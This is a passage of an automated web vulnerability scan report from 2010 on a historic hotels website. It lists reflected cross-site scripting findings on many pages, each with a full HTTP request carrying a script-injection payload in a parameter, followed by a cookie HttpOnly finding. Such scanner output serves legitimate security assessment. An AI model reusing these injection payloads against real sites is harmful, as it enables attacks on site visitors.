Accept: image/jpeg, image/gif, image/pjpeg, application/x-ms-application, application/xaml+xml, application/x-ms-xbap, */*
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E)
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive
Host: www.historichotels.org
Cookie: __utmc=15851695; __utma=15851695.1873633605.1287100145.1287100145.1287617241.2; __utmz=15851695.1287617241.2.2.utmccn=(referral)|utmcsr=summithotels.com|utmcct=/summit/special_offers/index.aspx|utmcmd=referral; __utmb=15851695; PHPSESSID=e9406215f1938f2fbeb75b56ce1db479

Response

HTTP/1.1 200 OK
Connection: close
Date: Thu, 21 Oct 2010 00:04:02 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/4.4.7
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Last-Modified: Thu, 21 Oct 2010 00:04:02 GMT
Cache-Control: no-store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Pragma: no-cache
Content-type: text/html


<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<HTML>
<HEAD>
<title>Historic Hotels of America</title>
<META http-equiv=Content-Type
...[SNIP]...
<a href="/index.php?e7ed0"><script>alert(1)</script>0e15bcac0c7=1&layout=print">
...[SNIP]...

2.2. http://www.historichotels.org/SpecialsPackages [7f98a">4d036e11c5f parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.historichotels.org
Path:   /SpecialsPackages

Issue detail

The value of the 7f98a"><script>alert(1)</script>4d036e11c5f request parameter is copied into the HTML document as plain text between tags. The payload 86f2b<script>alert(1)</script>87d03959330 was submitted in the 7f98a"><script>alert(1)</script>4d036e11c5f parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /SpecialsPackages?7f98a"><script>alert(1)</script>4d036e11c5f=186f2b<script>alert(1)</script>87d03959330 HTTP/1.1
Accept: image/jpeg, image/gif, image/pjpeg, application/x-ms-application, application/xaml+xml, application/x-ms-xbap, */*
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E)
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive
Host: www.historichotels.org
Cookie: __utmc=15851695; __utma=15851695.1873633605.1287100145.1287100145.1287617241.2; __utmz=15851695.1287617241.2.2.utmccn=(referral)|utmcsr=summithotels.com|utmcct=/summit/special_offers/index.aspx|utmcmd=referral; __utmb=15851695; PHPSESSID=e9406215f1938f2fbeb75b56ce1db479

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 20 Oct 2010 23:54:34 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/4.4.7
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Last-Modified: Wed, 20 Oct 2010 23:54:34 GMT
Cache-Control: no-store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Pragma: no-cache
Content-type: text/html


<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<HTML>
<HEAD>
<title>Specials & Packages, Historic Hotels of America</title>
<META ht
...[SNIP]...
</script>4d036e11c5f=186f2b<script>alert(1)</script>87d03959330/print">
...[SNIP]...

2.3. http://www.historichotels.org/SpecialsPackages [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.historichotels.org
Path:   /SpecialsPackages

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7f98a"><script>alert(1)</script>4d036e11c5f was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /SpecialsPackages?7f98a"><script>alert(1)</script>4d036e11c5f=1 HTTP/1.1
Accept: image/jpeg, image/gif, image/pjpeg, application/x-ms-application, application/xaml+xml, application/x-ms-xbap, */*
Referer: http://www.historichotels.org/
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E)
Accept-Encoding: gzip, deflate
Host: www.historichotels.org
Proxy-Connection: Keep-Alive
Cookie: __utmc=15851695; __utma=15851695.1873633605.1287100145.1287100145.1287617241.2; __utmz=15851695.1287617241.2.2.utmccn=(referral)|utmcsr=summithotels.com|utmcct=/summit/special_offers/index.aspx|utmcmd=referral; __utmb=15851695; PHPSESSID=e9406215f1938f2fbeb75b56ce1db479

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 20 Oct 2010 23:47:12 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/4.4.7
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Last-Modified: Wed, 20 Oct 2010 23:47:12 GMT
Cache-Control: no-store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Pragma: no-cache
Content-type: text/html


<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<HTML>
<HEAD>
<title>Specials & Packages, Historic Hotels of America</title>
<META ht
...[SNIP]...
<a href="http://www.historichotels.org:80/SpecialsPackages?7f98a"><script>alert(1)</script>4d036e11c5f=1/print">
...[SNIP]...

2.4. http://www.historichotels.org/fckeditor/editor/images2/1x1.gif [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.historichotels.org
Path:   /fckeditor/editor/images2/1x1.gif

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f70b7"><script>alert(1)</script>8cd7972f9ac was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /fckeditor/editor/images2/1x1.gif?f70b7"><script>alert(1)</script>8cd7972f9ac=1 HTTP/1.1
Accept: */*
Referer: http://www.historichotels.org/
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E)
Accept-Encoding: gzip, deflate
Host: www.historichotels.org
Proxy-Connection: Keep-Alive
Cookie: __utmc=15851695; __utma=15851695.1873633605.1287100145.1287100145.1287617241.2; __utmz=15851695.1287617241.2.2.utmccn=(referral)|utmcsr=summithotels.com|utmcct=/summit/special_offers/index.aspx|utmcmd=referral; __utmb=15851695; PHPSESSID=e9406215f1938f2fbeb75b56ce1db479

Response

HTTP/1.1 404 Not Found
Connection: close
Date: Thu, 21 Oct 2010 00:04:35 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/4.4.7
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Last-Modified: Thu, 21 Oct 2010 00:04:35 GMT
Cache-Control: no-store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Pragma: no-cache
Content-type: text/html


<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<HTML>
<HEAD>
<title>Historic Hotels of America</title>
<META http-equiv=Content-Type
...[SNIP]...
<a href="http://www.historichotels.org:80/fckeditor/editor/images2/1x1.gif?f70b7"><script>alert(1)</script>8cd7972f9ac=1/print">
...[SNIP]...

2.5. http://www.historichotels.org/index.php [layout parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.historichotels.org
Path:   /index.php

Issue detail

The value of the layout request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c35c9"><script>alert(1)</script>e261bb56dd5 was submitted in the layout parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /index.php?layout=printc35c9"><script>alert(1)</script>e261bb56dd5 HTTP/1.1
Host: www.historichotels.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=15851695.1287617241.2.2.utmccn=(referral)|utmcsr=summithotels.com|utmcct=/summit/special_offers/index.aspx|utmcmd=referral; PHPSESSID=e9406215f1938f2fbeb75b56ce1db479; __utma=15851695.1873633605.1287100145.1287100145.1287617241.2; __utmc=15851695; __utmb=15851695;

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 20 Oct 2010 23:41:53 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/4.4.7
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Last-Modified: Wed, 20 Oct 2010 23:41:53 GMT
Cache-Control: no-store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Pragma: no-cache
Content-type: text/html


<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<HTML>
<HEAD>
<title>Historic Hotels of America</title>
<META http-equiv=Content-Type
...[SNIP]...
<a href="/index.php?layout=printc35c9"><script>alert(1)</script>e261bb56dd5">
...[SNIP]...

2.6. http://www.historichotels.org/index.php [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.historichotels.org
Path:   /index.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a625a"><script>alert(1)</script>23f956abad0 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /index.php?a625a"><script>alert(1)</script>23f956abad0=1 HTTP/1.1
Host: www.historichotels.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=15851695.1287617241.2.2.utmccn=(referral)|utmcsr=summithotels.com|utmcct=/summit/special_offers/index.aspx|utmcmd=referral; PHPSESSID=e9406215f1938f2fbeb75b56ce1db479; __utma=15851695.1873633605.1287100145.1287100145.1287617241.2; __utmc=15851695; __utmb=15851695;

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 20 Oct 2010 23:53:13 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/4.4.7
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Last-Modified: Wed, 20 Oct 2010 23:53:13 GMT
Cache-Control: no-store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Pragma: no-cache
Content-type: text/html


<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<HTML>
<HEAD>
<title>Historic Hotels of America</title>
<META http-equiv=Content-Type
...[SNIP]...
<a href="/index.php?a625a"><script>alert(1)</script>23f956abad0=1&layout=print">
...[SNIP]...

2.7. http://www.historichotels.org/shop [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.historichotels.org
Path:   /shop

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b6504"><script>alert(1)</script>8651c0f176b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /shop?b6504"><script>alert(1)</script>8651c0f176b=1 HTTP/1.1
Host: www.historichotels.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=15851695.1287617241.2.2.utmccn=(referral)|utmcsr=summithotels.com|utmcct=/summit/special_offers/index.aspx|utmcmd=referral; PHPSESSID=e9406215f1938f2fbeb75b56ce1db479; __utma=15851695.1873633605.1287100145.1287100145.1287617241.2; __utmc=15851695; __utmb=15851695;

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 20 Oct 2010 23:55:13 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/4.4.7
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Last-Modified: Wed, 20 Oct 2010 23:55:13 GMT
Cache-Control: no-store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Pragma: no-cache
Content-type: text/html


<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<HTML>
<HEAD>
<title>Shop HHA, Historic Hotels of America</title>
<META http-equiv=Co
...[SNIP]...
<a href="http://www.historichotels.org:80/shop?b6504"><script>alert(1)</script>8651c0f176b=1/print">
...[SNIP]...

2.8. http://www.historichotels.org/spas_retreats [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.historichotels.org
Path:   /spas_retreats

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3f806"><script>alert(1)</script>e91a31b68a8 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /spas_retreats?3f806"><script>alert(1)</script>e91a31b68a8=1 HTTP/1.1
Host: www.historichotels.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=15851695.1287617241.2.2.utmccn=(referral)|utmcsr=summithotels.com|utmcct=/summit/special_offers/index.aspx|utmcmd=referral; PHPSESSID=e9406215f1938f2fbeb75b56ce1db479; __utma=15851695.1873633605.1287100145.1287100145.1287617241.2; __utmc=15851695; __utmb=15851695;

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 20 Oct 2010 23:59:18 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/4.4.7
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Last-Modified: Wed, 20 Oct 2010 23:59:18 GMT
Cache-Control: no-store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Pragma: no-cache
Content-type: text/html


<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<HTML>
<HEAD>
<title>Historic Hotels of America</title>
<META http-equiv=Content-Type
...[SNIP]...
<a href="http://www.historichotels.org:80/spas_retreats?3f806"><script>alert(1)</script>e91a31b68a8=1/print">
...[SNIP]...

2.9. http://www.historichotels.org/step_back_in_time [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.historichotels.org
Path:   /step_back_in_time

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e7acd"><script>alert(1)</script>54146981e4c was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /step_back_in_time?e7acd"><script>alert(1)</script>54146981e4c=1 HTTP/1.1
Host: www.historichotels.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=15851695.1287617241.2.2.utmccn=(referral)|utmcsr=summithotels.com|utmcct=/summit/special_offers/index.aspx|utmcmd=referral; PHPSESSID=e9406215f1938f2fbeb75b56ce1db479; __utma=15851695.1873633605.1287100145.1287100145.1287617241.2; __utmc=15851695; __utmb=15851695;

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 20 Oct 2010 23:55:42 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/4.4.7
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Last-Modified: Wed, 20 Oct 2010 23:55:42 GMT
Cache-Control: no-store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Pragma: no-cache
Content-type: text/html


<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<HTML>
<HEAD>
<title>Step Back in Time at The Grove Park Inn, Historic Hotels of Ameri
...[SNIP]...
<a href="http://www.historichotels.org:80/step_back_in_time?e7acd"><script>alert(1)</script>54146981e4c=1/print">
...[SNIP]...

2.10. http://www.historichotels.org/taste_of_napa [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.historichotels.org
Path:   /taste_of_napa

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7f987"><script>alert(1)</script>2a5e6c4b315 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /taste_of_napa?7f987"><script>alert(1)</script>2a5e6c4b315=1 HTTP/1.1
Host: www.historichotels.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=15851695.1287617241.2.2.utmccn=(referral)|utmcsr=summithotels.com|utmcct=/summit/special_offers/index.aspx|utmcmd=referral; PHPSESSID=e9406215f1938f2fbeb75b56ce1db479; __utma=15851695.1873633605.1287100145.1287100145.1287617241.2; __utmc=15851695; __utmb=15851695;

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 20 Oct 2010 23:55:25 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/4.4.7
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Last-Modified: Wed, 20 Oct 2010 23:55:25 GMT
Cache-Control: no-store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Pragma: no-cache
Content-type: text/html


<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<HTML>
<HEAD>
<title>A Taste of Napa Valley History, Historic Hotels of America</title
...[SNIP]...
<a href="http://www.historichotels.org:80/taste_of_napa?7f987"><script>alert(1)</script>2a5e6c4b315=1/print">
...[SNIP]...

2.11. http://www.historichotels.org/the_heathman_hotel_offer [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.historichotels.org
Path:   /the_heathman_hotel_offer

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2d9db"><script>alert(1)</script>edc8617529c was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /the_heathman_hotel_offer?2d9db"><script>alert(1)</script>edc8617529c=1 HTTP/1.1
Host: www.historichotels.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=15851695.1287617241.2.2.utmccn=(referral)|utmcsr=summithotels.com|utmcct=/summit/special_offers/index.aspx|utmcmd=referral; PHPSESSID=e9406215f1938f2fbeb75b56ce1db479; __utma=15851695.1873633605.1287100145.1287100145.1287617241.2; __utmc=15851695; __utmb=15851695;

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 20 Oct 2010 23:56:01 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/4.4.7
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Last-Modified: Wed, 20 Oct 2010 23:56:01 GMT
Cache-Control: no-store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Pragma: no-cache
Content-type: text/html


<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<HTML>
<HEAD>
<title>Art and History Collide at The Heathman Hotel, Historic Hotels of
...[SNIP]...
<a href="http://www.historichotels.org:80/the_heathman_hotel_offer?2d9db"><script>alert(1)</script>edc8617529c=1/print">
...[SNIP]...

2.12. http://www.historichotels.org/the_lenox_special_offer [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.historichotels.org
Path:   /the_lenox_special_offer

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2b40d"><script>alert(1)</script>5c734b3514 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /the_lenox_special_offer?2b40d"><script>alert(1)</script>5c734b3514=1 HTTP/1.1
Host: www.historichotels.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=15851695.1287617241.2.2.utmccn=(referral)|utmcsr=summithotels.com|utmcct=/summit/special_offers/index.aspx|utmcmd=referral; PHPSESSID=e9406215f1938f2fbeb75b56ce1db479; __utma=15851695.1873633605.1287100145.1287100145.1287617241.2; __utmc=15851695; __utmb=15851695;

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 20 Oct 2010 23:55:58 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/4.4.7
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Last-Modified: Wed, 20 Oct 2010 23:55:58 GMT
Cache-Control: no-store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Pragma: no-cache
Content-type: text/html


<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<HTML>
<HEAD>
<title>(Time) Travel to Historic Boston at The Lenox, Historic Hotels of
...[SNIP]...
<a href="http://www.historichotels.org:80/the_lenox_special_offer?2b40d"><script>alert(1)</script>5c734b3514=1/print">
...[SNIP]...

2.13. http://www.historichotels.org/vacations_leisure [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.historichotels.org
Path:   /vacations_leisure

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 869a9"><script>alert(1)</script>1d2c0bb49de was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /vacations_leisure?869a9"><script>alert(1)</script>1d2c0bb49de=1 HTTP/1.1
Host: www.historichotels.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=15851695.1287617241.2.2.utmccn=(referral)|utmcsr=summithotels.com|utmcct=/summit/special_offers/index.aspx|utmcmd=referral; PHPSESSID=e9406215f1938f2fbeb75b56ce1db479; __utma=15851695.1873633605.1287100145.1287100145.1287617241.2; __utmc=15851695; __utmb=15851695;

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 20 Oct 2010 23:58:45 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/4.4.7
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Last-Modified: Wed, 20 Oct 2010 23:58:45 GMT
Cache-Control: no-store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Pragma: no-cache
Content-type: text/html


<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<HTML>
<HEAD>
<title>Historic Hotels of America</title>
<META http-equiv=Content-Type
...[SNIP]...
<a href="http://www.historichotels.org:80/vacations_leisure?869a9"><script>alert(1)</script>1d2c0bb49de=1/print">
...[SNIP]...

2.14. http://www.historichotels.org/woodlands_inn_1906 [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.historichotels.org
Path:   /woodlands_inn_1906

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload cb76e"><script>alert(1)</script>04f1b7a6ed1 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /woodlands_inn_1906?cb76e"><script>alert(1)</script>04f1b7a6ed1=1 HTTP/1.1
Host: www.historichotels.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=15851695.1287617241.2.2.utmccn=(referral)|utmcsr=summithotels.com|utmcct=/summit/special_offers/index.aspx|utmcmd=referral; PHPSESSID=e9406215f1938f2fbeb75b56ce1db479; __utma=15851695.1873633605.1287100145.1287100145.1287617241.2; __utmc=15851695; __utmb=15851695;

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 20 Oct 2010 23:56:03 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/4.4.7
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Last-Modified: Wed, 20 Oct 2010 23:56:03 GMT
Cache-Control: no-store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Pragma: no-cache
Content-type: text/html


<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<HTML>
<HEAD>
<title>Southern Hospitality at Its Finest, Historic Hotels of America</t
...[SNIP]...
<a href="http://www.historichotels.org:80/woodlands_inn_1906?cb76e"><script>alert(1)</script>04f1b7a6ed1=1/print">
...[SNIP]...

2.15. http://www.historichotels.org/wort_hospitality [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.historichotels.org
Path:   /wort_hospitality

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 51881"><script>alert(1)</script>f83ac179d2e was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /wort_hospitality?51881"><script>alert(1)</script>f83ac179d2e=1 HTTP/1.1
Host: www.historichotels.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=15851695.1287617241.2.2.utmccn=(referral)|utmcsr=summithotels.com|utmcct=/summit/special_offers/index.aspx|utmcmd=referral; PHPSESSID=e9406215f1938f2fbeb75b56ce1db479; __utma=15851695.1873633605.1287100145.1287100145.1287617241.2; __utmc=15851695; __utmb=15851695;

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 20 Oct 2010 23:56:06 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/4.4.7
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Last-Modified: Wed, 20 Oct 2010 23:56:06 GMT
Cache-Control: no-store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Pragma: no-cache
Content-type: text/html


<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<HTML>
<HEAD>
<title>Experience Traditional Western Hospitality, Historic Hotels of Am
...[SNIP]...
<a href="http://www.historichotels.org:80/wort_hospitality?51881"><script>alert(1)</script>f83ac179d2e=1/print">
...[SNIP]...

3. Cookie without HttpOnly flag set  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.historichotels.org
Path:   /

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Issue background

If the HttpOnly attribute is set on a cookie, then the cookie's value cannot be read or set by client-side JavaScript. This measure can prevent certain client-side attacks, such as cross-site scripting, from trivially capturing the cookie's value via an injected script.

Issue remediation

There is usually no good reason not to set the HttpOnly flag on all cookies. Unless you specifically require legitimate client-side scripts within your application to read or set a cookie's value, you should set the HttpOnly flag by including this attribute within the relevant Set-cookie directive.

You should be aware that the restrictions imposed by the HttpOnly flag can potentially be circumvented in some circumstances, and that numerous other serious attacks can be delivered by client-side script injection, aside from simple cookie stealing.

Request

GET / HTTP/1.1
Accept: */*
Referer: http://www.summithotels.com/summit/special_offers/index.aspx
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E)
Accept-Encoding: gzip, deflate
Host: www.historichotels.org
Proxy-Connection: Keep-Alive
Cookie: __utma=15851695.1873633605.1287100145.1287100145.1287100145.1; __utmz=15851695.1287100145.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none)

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 20 Oct 2010 23:39:16 GMT
